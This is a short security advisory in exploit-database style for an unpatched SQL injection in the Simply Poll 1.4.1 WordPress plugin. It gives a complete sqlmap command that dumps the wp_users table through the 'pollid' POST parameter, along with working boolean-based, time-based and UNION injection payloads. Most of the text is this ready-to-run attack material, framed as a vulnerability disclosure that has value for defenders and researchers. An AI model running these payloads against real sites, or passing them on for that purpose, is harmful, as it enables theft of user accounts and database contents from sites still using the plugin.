# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress A SQL Injection # Date: 21/12/2016 # Exploit Author: TAD GROUP # Vendor Homepage: https://wordpress.org/plugins/simply-poll/ # Software Link: https://wordpress.org/plugins/simply-poll/ # Contact: info@tad.bg # Website: http://tad.bg <http://tad.bg/> # Category: Web Application Exploits 1 - Description An unescaped parameter was found in Simply Poll version 1.4.1. ( WP plugin ). An attacker can exploit this vulnerability to read from the database. The POST parameter 'pollid' is vulnerable. 2. Proof of Concept sqlmap -u "http://example.com/wp-admin/admin-ajax.php" --data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3 Parameter: pollid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=spAjaxResults&pollid=2 AND 6034=6034 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: action=spAjaxResults&pollid=2 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a634844657 9564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL-- CfNO 3. Attack outcome: An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access the filesystem may be possible. 4 Impact: Critical 5. Affected versions: <= 1.4.1 6. Disclosure Timeline: 21-Dec-2016 A found the vulnerability 21-Dec-2016 A informed the developer 28-Dec-2016 A release date of this security advisory Not fixed at the date of submitting that exploit.